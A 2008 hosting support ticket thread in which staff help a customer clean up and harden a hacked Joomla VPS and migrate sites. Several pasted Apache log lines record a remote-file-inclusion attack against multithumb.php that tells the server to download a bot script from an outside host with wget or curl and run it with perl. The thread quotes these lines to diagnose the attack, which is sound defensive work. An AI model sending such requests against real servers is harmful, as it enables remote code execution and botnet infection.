Looks like System resources usage and CPU are very high (I'm not sure what should be the standard level at my stage) and also user nobody CPU stats are scary...
I'm not sure how to check where this is coming from exactly (if there's something wrong that is)
Could you tell me what to look for please
Kindly
Posted On: 25 Mar 2008 08:33 AM
Greetings,
On your VPS was uploaded a lot of hacker scripts:
-rw-r--r-- 1 nobody nobody 93430 Mar 25 08:25 cmdtemp
drwxr-xr-x 2 root root 4096 Mar 25 07:06 cpbandwidth
-rw------- 1 nobody nobody 13693 Mar 24 17:10 eCoLoGy.txt
-rw------- 1 nobody nobody 13678 Mar 22 11:43 echo.txt
-rw------- 1 nobody nobody 13693 Mar 24 17:33 ecology.txt
-rw-r--r-- 1 nobody nobody 48 Mar 22 13:27 errors.php
-rw------- 1 nobody nobody 77436 Mar 21 11:01 g.txt
-rw------- 1 nobody nobody 77447 Mar 21 10:29 g3mz.txt
-rw------- 1 nobody nobody 77435 Mar 21 10:52 gems.txt
-rw------- 1 nobody nobody 77421 Mar 21 11:05 gg.txt
-rw------- 1 nobody nobody 13675 Mar 21 18:12 info.txt
-rw------- 1 nobody nobody 97841 Mar 24 19:00 load.txt
-rw------- 1 nobody nobody 46797 Mar 18 13:50 logs.txt
-rw------- 1 nobody nobody 24590 Mar 20 22:10 lol-aaa.txt
-rw------- 1 nobody nobody 77424 Mar 21 11:09 m.txt
-rw------- 1 nobody nobody 53723 Mar 18 14:49 masterAAA.txt
-rw------- 1 nobody nobody 77213 Mar 22 11:41 mobs.txt
Best regards,
Stas S.
Level 3 Dep.
Matthieu Lagier
Posted On: 25 Mar 2008 09:00 AM
Thanks a lot... this is crazy...
I guess there's no way to know where this is coming from right?
I see the apache log for hotel-a-to-z.com. Should I just re-install the whole website or is there a way to find out where that's coming from before (script and hacker origin). I can guess from the apache log that it's from the indian programmer who sold me that jvlink_exchanger application... but I guess there's no way to prove that...
I see now only System Usage
Posted On: 25 Mar 2008 09:17 AM
Greetings,
You should check this file - multithumb/multithumb.php, as seem from logs - it's was used for uploading files.
I'm thinking that your should close security breach and do not wasting time for searching scriptkiddies or infected windows computers (most of such hacks was did using botnets).
Best regards,
Posted On: 25 Mar 2008 09:28 AM
Hi,
Thanks for info and you are right, no time to waste hunting ghosts....
it's just that if I can prove that i's coming from which or which application, I can make posts to warn future victims... the developer I suspect is recommended by extensions.joomla.org (he's indian (and log mentions "compatible; Indy Library") and he's had temporary access to my cpanel))... so if it's him and can be proved I must warn other users...
Anyway, Thanks a lot for help
Kindly
Posted On: 25 Mar 2008 09:35 AM
Matthieu,
"Mozilla/3.0 (compatible; Indy Library)" from access logs it's just fake browser UserAgent, you should not make such conclusion from it.
Best regards,
Posted On: 25 Mar 2008 10:28 AM
Hi,
You are very right, I absolutely can say nothing unless I can prove it... it's just a couple of things about him that are not right... anyway...
sorry if I use your time again in order to avoid contacting you for the same issue in the future:
1. WHM: I went to the "scan for trojan horse" utility and see many "possible trojans". what I dont see is the utility to remove them and to check them out (I guess google)
2. I can't locate the Apache Log
3. In the Apache log, how can you identify a suspect entry?
I'd understand if you dont take the time to answer all questions for I guess some are out of support responsibility
Kindly
Posted On: 25 Mar 2008 10:47 AM
Greetings,
I'm not recommending to trust this WHM option. If you want, I could install rkhunter and check your VPS on rootkits\backdoors.M
Hi,
a. Yes, please go ahead with "install rkhunter and check your VPS on rootkits\backdoors" and all the security enhancement you think about; I'm still looking around forums to see all the necessary components to secure joomla completely.
b. Looks like there's still something pretty heavy going on because I see CPU and system resources going very high regularly... maybe the hotel-a-to-z.com thing.
c. about the issue on hotel-a-to-z.com: error message mentions path mambots/content/multithumb/ but this folder doesn't seem to exist... still looking...
d. I juste received this mail from cpanelserver.rootshosting.net and it says:
cpsrvd failed Tue Mar 25 11:02:17 2008. A restart was attempted automagically
but I have attempted no restart...
Thanks again for your time
Kindly
Posted On: 25 Mar 2008 11:30 AM
Greetings,
Seems hackers uploaded files again. Checking.
Best regards,
Stas S.
Level 3 Dep.
Stas S.
Posted On: 25 Mar 2008 11:53 AM
Greetings,
Yes, uploaded in /tmp/cmdtemp
perl 6118 nobody 1w REG 8,2 14038 868370 /tmp/cmdtemp
perl 6118 nobody 2w REG 8,2 14038 868370 /tmp/cmdtemp
You have really unsecured installations on server:
-bash-3.00# ls -la /home/hoteldel/public_html/joomla/administrator/components/com_joomlaxplorer/
total 87
drwxr-xr-x 10 nobody nobody 1024 Mar 13 11:04 .
drwxrwxrwx 33 hoteldel hoteldel 1024 Mar 13 11:04 ..
-rw-r--r-- 1 nobody nobody 105 Feb 21 10:54 .htaccess
-rw-r--r-- 1 nobody nobody 6127 Feb 9 12:08 CHANGELOG.txt
-rw-r--r-- 1 nobody nobody 25753 Feb 9 12:08 LICENSE
-rw-r--r-- 1 nobody nobody 6169 Feb 21 10:49 README.txt
-rw-r--r-- 1 nobody nobody 2796 Feb 9 12:08 RELEASE.txt
-rw-r--r-- 1 nobody nobody 9324 Feb 21 10:49 admin.joomlaxplorer.php
drwxr-xr-x 2 nobody nobody 1024 Mar 13 11:04 config
drwxr-xr-x 2 nobody nobody 1024 Mar 13 11:04 ftp_tmp
drwxr-xr-x 2 nobody nobody 2048 Mar 13 11:04 images
drwxr-xr-x 2 nobody nobody 1024 Mar 13 11:04 include
-rw-r--r-- 1 nobody nobody 544 Feb 21 10:52 index.html
-rw-r--r-- 1 nobody nobody 648 Feb 21 10:49 install.joomlaxplorer.php
-rw-r--r-- 1 nobody nobody 14877 Feb 9 12:08 joomlaxplorer.xml
drwxr-xr-x 2 nobody nobody 2048 Mar 13 11:04 languages
drwxr-xr-x 5 nobody nobody 1024 Mar 13 11:04 libraries
-rw-r--r-- 1 nobody nobody 1075 Feb 21 10:54 properties.php
drwxr-xr-x 3 nobody nobody 1024 Mar 13 11:04 scripts
drwxr-xr-x 2 nobody nobody 1024 Mar 13 11:04 style
-rw-r--r-- 1 nobody nobody 619 Feb 21 10:54 system.php
Files are owned by nobody user - this is means that anyone could unload\change any files on your server using exploited scripts.
I've allowed perl only for root, blocked output access on ports 6667.
Without securing home directories such situation could happened again.
Best regards,
Posted On: 25 Mar 2008 12:16 PM
Hi,
Thanks a lot for all your time.
Should I run chown for each account? (this I think I can do)
What do you call securing home directory?
I thought I'd go step by step with the VPS setup in order to learn as I go but it's much more urgent than I though.
I understood that these 3 things are necessary to run joomla properly
Apache suExec PHP open_basedir PHP SafeMode
I think suPHP and mod_security have already been installed but I don't know what I should do with file chmod... I see that some files are still 777 and I have not yet had time to learn how to setup suPHP and change chmod while having my websites run still...
It's gonna take me months to learn all that...
It's ok if I'm billed extra for custom setup really... at this point HFW is the best person I could hire to setup my VPS right for extensive joomla use...
Kindly
Matthieu
Posted On: 25 Mar 2008 01:12 PM
Greetings,
>What do you call securing home directory?
Changing owner for all accounts to UID, setting secured permissions on files (644) and folders (755).
We could try to set it recursively for all accounts.
Best regards,
Stas S.
Level 3 Dep.
Matthieu Lagier
Posted On: 25 Mar 2008 01:22 PM
hello,
Yes, please go ahead for all security changes, I'll look if the websites are still ok after you're done.
what about all these modules I mentionned? Is it possible to help me with their setup and config?
You also didnt' tell me if I could pay extra for the extra work...
If not I'll have to find something to purchase ^_^
Kindly
Posted On: 25 Mar 2008 01:52 PM
Greetings,
Looking into this.
Best regards,
Stas S.
Level 3 Dep.
Stas S.
Posted On: 25 Mar 2008 02:58 PM
Greetings,
Ok, done. All files and directories at all users have secured permissions and right owner.
Best regards,
Posted On: 25 Mar 2008 03:11 PM
hello,
I'm having authorisation problem now with some scripts such as:
http://rayonghomeandland.com/index.php?option=com_estateagent&act=object&task=showEO&id=10
where I get the error message:
Warning: session_start() [function.session-start]: open(/tmp/sess_370d88aed37519bf04e16, O_RDWR) failed: Permission denied (13) in /home/homeandl/public_html/components/com_estateagent/estateagent.php on line 33
Is it possible tht some scripts will refuse to work now?
Also cpanels (url:2082) are unreacheable
Posted On: 25 Mar 2008 04:09 PM
Hello,
I've fixed permissions on /tmp so that session files can get written out again. Please check now, this should be working.
Best Regards,
Posted On: 25 Mar 2008 10:08 PM
Hello,
Great ^_^
Yes, script is displaying properly now.
VZ resources seem normal at <1% CPU and <25% system
Then it looks like we are reaching the end of this guiness book ticket.
I'll make a thorough check of the websites the coming 2 days and finalise the migration.
btw, please tell me of the following which were installed and if possible where is best to access utility/config of:
suExec
PHP open_basedir
PHP SafeMode
suPHP
mod_security
rkhunter
other modules and things that I need to access or monitor so I don't have to bug you again in the future.
On my side I'm also going to go shopping again on WHM in order to show appreciation.
Thank you again
Kindly
Posted On: 25 Mar 2008 10:17 PM
Hello,
From the looks of it, open_basedir, safe_mode are off currently. These are trivial to enable so it's probably a good idea. Suexec is enabled. suPHP was installed but it isn't currently enabled. mod_security and rkhunter are installed.
Best Regards,
Posted On: 26 Mar 2008 08:40 AM
Hi,
sorry again... I seem unable to open :2082 pages as well as WHM.
I get the following error messages:
The connection has timed out
The server at 66.225.216.125 is taking too long to respond.
* The site could be temporarily unavailable or too busy. Try again in a few
moments.
* If you are unable to load any pages, check your computer's network
connection.
* If your computer or network is protected by a firewall or proxy, make sure
that Firefox is permitted to access the Web.
Dmitry Y.
Posted On: 26 Mar 2008 12:40 PM
Hello,
Fixed. Try now
Posted On: 26 Mar 2008 01:16 PM
Hi again
:( so sorry... I received one of these mails again:
eximstats on server.rootshosting.net failed?
eximstats failed Wed Mar 26 13:13:45 2008. A restart was attempted automagically.
Is that bad?
Kindly
Matthieu
Dmitry Y.
Posted On: 26 Mar 2008 01:34 PM
It is no bad, but I fix problem.
Matthieu Lagier
Posted On: 26 Mar 2008 02:08 PM
Please sir, tell me what it was and what you did so I can do it myself next time
and thank you
Kindly
Posted On: 26 Mar 2008 02:20 PM
Hello,
I do next steps via ssh:
/scripts/realperlinstaller --force DBD::mysql
/scripts/restartsrv_eximstats
Worked for you.
Matthieu Lagier
Posted On: 27 Mar 2008 12:08 AM
Hi,
This post is important but not urgent and relates to 2 previous issues that may be related or not:
I'm trying to solve myself the problem with tht script exploit on hotel-a-to-z:
a-to-z.com:217.54.144.138 - - [24/Mar/2008:15:10:44 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ay2dayz-download.com/tool25.txt?&cmd=cd%20/tmp;rm%20bot.txt;wget%20http://www.ay2dayz-download.com/bot.txt;fetch%20http://www.ay2dayz-download.com/bot.txt;lwp-download%20http://www.ay2dayz-download.com/bot.txt;curl%20-O%20http://www.ay2dayz-download.com/bot.txt;lynx%20http://www.ay2dayz-download.com/bot.txt;perl%20bot.txt HTTP/1.1" 403 - "-" "Mozilla/3.0 (compatible; Indy Library)"
1. I suspended the account hotel-a-to-z.com because I'm unable to locate folder /mambots/contents/multithumb... it doesn't exist in hotel-a-to-z
2. regarding the 2 posts ealrier, answered by dimitry: I still get that kind of mails eventhough I've cleaned :
Mail delivery failed: returning message to sender?
From: Mail Delivery System (Mailer-Daemonserver.rootshosting.net)
Sent: Thursday, March 27, 2008 12:00:12 PM Thu Mar 27 00:00:08 2008.
A restart was attempted automagically. <-------------------------------------------------
S0 I'M NOT sure if where the problem is coming from and what to do anymore... I'd like to clean my accounts once and for all...
pleae help when you got time
Kindly
Matthieu
Tom H.
Posted On: 27 Mar 2008 07:50 AM
Matthieu,
I am checking your server, will get back to you with more info soon.
Best regards,
Posted On: 27 Mar 2008 02:32 PM
hi,
this is just an update to the current problem to inform you that
- I'm getting so many of these mails and of delivery failure, about a hundred a day
- my WHM and cpanel pages don't open again
that's it
thanks a lot
Kindly
Posted On: 27 Mar 2008 04:47 PM
Hello,
Looking into this currently.
Best Regards,
Posted On: 27 Mar 2008 06:01 PM
Hello,
This was due to your firewall configuration in VZPP. I've reset your firewall to "advanced mode - default accept." I am able to access WHM, etc, now. These were previously being blocked entirely.
Best Regards,
Posted On: 28 Mar 2008 01:16 PM
hi,
sorry, I see that this ticket is on hold.
There is still some issues mentioned earlier that I'm unable to resolve.
I'm asking your help for these two or please tell me if you can't help so I know where I stand.
1. I was getting eximstat failure reports (I've copied them in the previous posts but I'll put them below)
I get about 300 per day of these on my default email address (matthieulagierhotmail.com).
I set "disable send mail for user nobody" but I still get these mails
Mail is:
Return-path: Received: from root by server.rootshosting.net with local (Exim 4.68)(envelope-from )id 1JfIec-0001Mp-Swfor +66891777212server.rootshosting.net; Fri, 28 Mar 2008 12:46:14 -0500To: +66891777212server.rootshosting.netFrom: cpanelserver.rootshosting.netSubject: eximstats on server.rootshosting.net failedMessage-Id:
Date: Fri, 28 Mar 2008 12:46:14 -0500
eximstats failed Fri Mar 28 12:46:12 2008. A restart was attempted automagically.
2.
I still have an issue with website hotel-a-to-z
/etc/httpd/domlogs/hotelato/hotel-a-to-z.com:217.54.144.138 - - [24/Mar/2008:14:06:54 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ay2dayz-download.com/tool25.txt?&cmd=cd%20/tmp;rm%20bot.txt;wget%20http://www.ay2dayz-download.com/bot.txt;fetch%20http://www.ay2dayz-download.com/bot.txt;lwp-download%20http://www.ay2dayz-download.com/bot.txt;curl%20-O%20http://www.ay2dayz-download.com/bot.txt;lynx%20http://www.ay2dayz-download.com/bot.txt;perl%20bot.txt HTTP/1.1" 403 - "-" "Mozilla/3.0 (compatible; Indy Library)"
I've looked around on all information in that log but cant find what to do.
I've suspended the website until I can find out what's wrong with it.
What should I do please.
I really want to finish the lockup of all my scripts before I go forward and finish the migration.
I don't intend to try to take back the time nt used on server so I got time, but still I'd like to finish this transition phase with the sever cleaned up.
guide me on these 2 points if you can
Kindly
Posted On: 28 Mar 2008 04:15 PM
Hello, Matthieu.
1) Eximstats failures should disappear now.
2) Probably there was scripts which was exploited mambots/content/multithumb/multithumb.php
in hotelato account. As I can see it's already removed.
Let us know if we can further assist you.
Arthur D.
Level3 Department
Posted On: 29 Mar 2008 12:38 PM
hello,
I did something wrong I think.
I was trying to see how I could remove harmful scripts from file /etc/httpd/domlogs/hotelato/hotel-a-to-z.com
because I thought that my problems were from there
so I made a test on another website and I went and deleted all entries in /etc/httpd/domlogs/travelyu/yuwie-travel.com
Since I did that I can't access Virtuozzo anymore.
1. Please tell me how I can clean up these files (if they are potentially infected with harmful script)
2. Is it possible that you give me back access to Virtuozzo please.
Posted On: 29 Mar 2008 12:52 PM
The problem with Virtuozzo Power Panel has been fixed. It operates fine by now.
Best regards,
Posted On: 30 Mar 2008 08:57 PM
Hi,
sorry if I have to return to this issue.
HFW staff extplained to me that I had a script exploit:
/etc/httpd/domlogs/hotelato/hotel-a-to-z.com:217.54.144.138 - - [24/Mar/2008:14:06:54 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ay2dayz-download.com/tool25.txt?&cmd=cd%20/tmp;rm%20bot.txt;wget%20http://www.ay2dayz-download.com/bot.txt;fetch%20http://www.ay2dayz-download.com/bot.txt;lwp-download%20http://www.ay2dayz-download.com/bot.txt;curl%20-O%20http://www.ay2dayz-download.com/bot.txt;lynx%20http://www.ay2dayz-download.com/bot.txt;perl%20bot.txt HTTP/1.1" 403 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/etc/httpd/domlogs/hotelato/hotel-a-to-z.com:217.54.144.138 - - [24/Mar/2008:15:10:44 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ay2dayz-download.com/tool25.txt?&cmd=cd%20/tmp;rm%20bot.txt;wget%20http://www.ay2dayz-download.com/bot.txt;fetch%20http://www.ay2dayz-download.com/bot.txt;lwp-download%20http://www.ay2dayz-download.com/bot.txt;curl%20-O%20http://www.ay2dayz-download.com/bot.txt;lynx%20http://www.ay2dayz-download.com/bot.txt;perl%20bot.txt HTTP/1.1" 403 - "-" "Mozilla/3.0 (compatible; Indy Library)"
/etc/httpd/domlogs/hotelato/hotel-a-to-z.com:217.54.144.138 - - [24/Mar/2008:15:11:01 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ay2dayz-download.com/tool25.txt?&cmd=cd%20/tmp;rm%20bot.txt;wget%20http://www.ay2dayz-download.com/bot.txt;fetch%20http://www.ay2dayz-download.com/bot.txt;lwp-download%20http://www.ay2dayz-download.com/bot.txt;curl%20-O%20http://www.ay2dayz-download.com/bot.txt;lynx%20http://www.ay2dayz-download.com/bot.txt;perl%20bot.txt HTTP/1.1" 403 - "-" "Mozilla/3.0 (compatible; Indy Library)"
I guess that the file /etc/httpd/domlogs/hotelato/hotel-a-to-z.com is the problem but I cant' seem able to delete it's content (I did that on another webstie to test and it put the site down as well as the whole virtuozzo...)
Please tell me how I can get rid of that script for I had to suspend the website and would like to have it back online.
Kindly
Posted On: 30 Mar 2008 09:06 PM
Hello,
These are just attempts. From the 403 error code, you can see they weren't effective. Your server is going to inevitably get exploit attempts, but these weren't successful in this case.
Best Regards,
Posted On: 04 Apr 2008 08:02 AM
Greetings ^_^,
since my upgrade I had problems with several scripts, some I could fix, some still fixing.
but I got a problem a little more urgent with mail forms in a website.
I get return mails:
"This message was created automatically by mail delivery software. A message that you sent could not be delivered to one or more of itsrecipients. This is a permanent error. The following address(es) failed: montpaisiblebluewin.chMail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings"
Tweak Settings: "Prevent the user "nobody" from sending out mail to remote addresses (PHP and CGI scripts generally run as nobody if you are not using PHPSuexec and Suexec respectively.)" is on and I think you already installed PHPsuexec and Suexec...
So I"m not sure what to do... and it's pretty urgent for this site (same problem on other sites can wait till I know what to do, but I can't figure out where to start for this one...
Thanks if you got time to put me back on track
Kindly
Posted On: 04 Apr 2008 09:13 AM
Greetings,
I've removed this option from WHM,form mails should be fixed.
Best regards,
Posted On: 04 Apr 2008 09:20 AM
Hi,
sorry if I'm bothering you again for this issue... (on top of that I'm not even sure its your problem...)
Actually I didnt mean to disable a security feature... I was hoping to keep the security feature and still be able to have the mail form work...
Or do I misunderstand something...
coz unselecting a feature in tweak settings I can do... I just wanted to know how to still have mail form work on pages with a captcha while having that setting "on" in tweak setting for I'm looking for maximum security.
and if the solution lies in the page scripting rather than server modules settings please let me know so I dont bother you again with this problem.
Kindly
Matthieu
Posted On: 04 Apr 2008 09:57 AM
Greetings,
One way I could see in this case - use smtp authorization in scripts settings.
Best regards,
Posted On: 13 Apr 2008 09:05 AM
Greetings,
I notice now that since my migration of domain bookhostelbook.com, all subdomains for this url are giving me problems.
. they don't resolve
. they appear in WHM but not in bookhostelbook:2082
. I can't seem to be able to delete them or to create them again... nor to change where they point
reason for that is probably that this domain used to be an addon domain before migration.
Please tell me what to do
Kindly
Posted On: 13 Apr 2008 09:27 AM
Hello,
What specific subdomains are missing so that we can check and test these?
Best Regards,
Posted On: 13 Apr 2008 09:53 AM
Hello,
These domains were missing DNS entries. I've regenerated these from httpd.conf which still had VirtualHosts for these subdomains. They're loading now when i test.
Best Regards,
Posted On: 10 May 2008 09:56 PM
Hi,
This ticket is not urgent and can wait for Erik R to come online for he is the one most involved in this ticket.
I would like to finalize the migration of all remaining websites to VPS now. I"m not sure which urls have not been yet migrated but I think rootsreggaeclub.com and reggaecollective.com are the last ones
When you do that, can you also run the file chown and chmod (755-644) and I'd love if you could tell me the right formula for ssh when i want to chmod all files and folders at once ^_^... still couldnt figure out that one
and thanks again for your help
Kindly
Posted On: 11 May 2008 05:08 PM
Hello,
We'll start migrating these two accounts over now. We'll update you once this is complete so that you can check them prior to migrating the DNS. Please stand by.
Best Regards,
Posted On: 11 May 2008 05:14 PM
I've been going through the ticket history on this since it's been a while since your last reply. Is it just the DNS that remains to be updated for the rootsreggaeclub.com and reggaecollective.com accounts? http://66.225.216.125/~reggae/ is up and running at the VPS already, but, do you need any further data sync'd over from the shared accounts?
Best Regards,
Posted On: 12 May 2008 11:57 AM
Hi,
this ticket is not urgent and can wait for Erik R to come online
sorry for late reply
yes, rootsreggaeclub should be syncronised.
I didnt check the online version yet actually but it's not really important, if you just syncronise data and I'll change dns and check the site live
Thanks a lot
Kindly
Posted On: 12 May 2008 08:46 PM
Hello,
These accounts are still packaging on the shared server. I'll update you once they're transferred over and restored.
Best Regards,
Posted On: 12 May 2008 11:25 PM
Hello,
Backups are copied, we're restoring now.
Best Regards,
Posted On: 13 May 2008 04:33 AM
Hi,
account reggae has been copied over - we might have to migrate the database separately once more - please confirm if Ok to proceed.
Best regards,
Posted On: 13 May 2008 09:32 AM
yes, it's ok to proceed, thanks
Posted On: 13 May 2008 04:55 PM
Hello,
reggae_joom1 is imported from the shared server. Can you please check and let us know if there are any issues with the imported data?
Best Regards,
Posted On: 14 May 2008 09:39 PM
Hi,
1. the website rootsreggaeclub.com is not showing since I made the dns after the syncronisation.
website looks down, unable to find templates... and the template of this site does not appear in the list of templates available, it's been removed somehow.
2. the administrator of joomla for rootsreggaeclub is loading properly but when going to the template page it shows this message:
Warning: file_get_contents() [function.file-get-contents]: SAFE MODE Restriction in effect. The script whose uid is 32004 is not allowed to access /home/reggae/public_html/templates/j!lmboxmusic/templateDetails.xml owned by uid 99 in /home/reggae/public_html/includes/domit/xml_domit_lite_parser.php on line 1079Warning: file_get_contents(/home/reggae/public_html/templates/j!lmboxmusic/templateDetails.xml) [function.file-get-contents]: failed to open stream: Permission denied in /home/reggae/public_html/includes/domit/xml_domit_lite_parser.php on line 1079
I think something went wrong during the migration
Kindly
Posted On: 14 May 2008 09:55 PM
Hello,
Please see http://www.rootsreggaeclub.com/ now, the site is loading without errors when I test.
Best Regards,
Posted On: 14 May 2008 10:04 PM
hi,
all good now, and template is back in the list and the error message is gone....
Thanks a lot.
Kindly
Posted On: 14 May 2008 10:10 PM
No problem! Let us know if you encounter any further issues.
Best Regards,
Posted On: 18 May 2008 08:48 AM
Hi,
After having checked for a couple of days since we finished the migration, I have so far these problems with the VPS:
1. AWSTATS are not working, I can see no stat and I get the following message:
Internal Server Error
Premature end of script headers: /usr/local/cpanel/base/awstats.pl: Please check /usr/local/cpanel/logs/error_log for the exact error.
cpsrvd/11.18.3 Server at rayonghomeandland.com
2. my disk space says 14.6GB and I'm very sure that my websites are no more than 3GB... that with a couple of backups can't reach 14GB...
how could I check where this disc space is used please?
Kindly
Posted On: 18 May 2008 10:33 AM
Hello,
Working on this. Will be back to you shortly.
Best regards,
Posted On: 18 May 2008 02:03 PM
Greetings,
There is disk usage on your VPS:
-bash-3.00# du -sh *
1.0K 1
0 aquota.group
0 aquota.user
4.0M bin
1.0K boot
3.0K dev
20K error_log
3.8M etc
7.9G home
1.2M hotelato_joom1
377K hotelato_joom1.sql
1.0K initrd
17M lib
1.0K media
1.0K mnt
1.0K opt
314M proc
348K reggaegu_joom1
269K reggaegu_joom1.sql
3.9G root
6.3M sbin
4.7M scripts
1.0K selinux
1.0K srv
1.0K stunnel.rnd
1.0K sys
2.8M tmp
563K unixbench-4.1.0-wht
79K unixbench-4.1.0-wht.tar.gz
2.5G usr
525M var
-bash-3.00# cd /root/
-bash-3.00# du -sh *
3.0K cpanel3-skel
8.6M cpmove-tonyrank.tar.gz
3.9G cprestore
2.9M dumps
1.0K error_log
1.0K firewall_reset
69K httpd.conf
24K named.backup
1.0K public_ftp
2.0K public_html
1.3M reggae_joom1.old
1.3M reggae_joom1.sql
828K rvadmin
3.8M sploits.cpio
About AWSTATS issue - please retry now, I've reinstalled perl on updated cpanel on your server.
Best regards,
Posted On: 19 May 2008 12:43 AM
hi,
I have looked into these.
1. space on server: I don't understand why /usr and /root folders are so big (3.9 and 2.5 GB)
sorry, Im not yet very familiar with VPS but it's strange to me that these 2 folders are bigger than the actual content of all the websites together. I'm looking in /home to see where I use so much space but please take a minute to explain to me why /usr and /root are so huge
2. awstats is now displaying but statistics are not recorded anymore. I hope I didnt' do something wrong in my WHM settings... please help on that too if you have time
Kindly
Posted On: 19 May 2008 12:52 AM
Greetings,
/root contains this file:
-bash-3.00# ll /root/cprestore/
total 3992831
-rw------- 1 root root 4072685316 May 13 00:28 cpmove-reggae.tar.gz
I could remove it.
Disk usage of /usr directory is normal. /usr contains most of system files, libs and binary fails.
I've started script, witch will be recreate all awstats logs, please recheck it in 3-4 hours and let us know if not fixed.
Best regards,
Posted On: 19 May 2008 01:03 AM
Thanks a lot for your help and explainations
I'll remove file cpmove-reggae.tar.gz myself since you tell me that it's ok to do so.
please tell me if it's possible to reload individual backups for websites from the main VPS backup on virtuozzo in which case I'll remove many backups and keep the main VPS backup.
I'm not yet familiar with restoring individual websites from root account so I'm not sure if I can remove backups for certain accounts... a hint on that could be most helpful
Thanks again
Kindly
Posted On: 19 May 2008 01:32 AM
Greetings,
Yes, we have backups of your VPS, at this moment we have backups from 10, 13 and 17 May.
But anyway I'm recommending to keep WHM backups for small accounts because restoring from WHM backups is much faster and easy.
Best regards,
Level 3 Dep.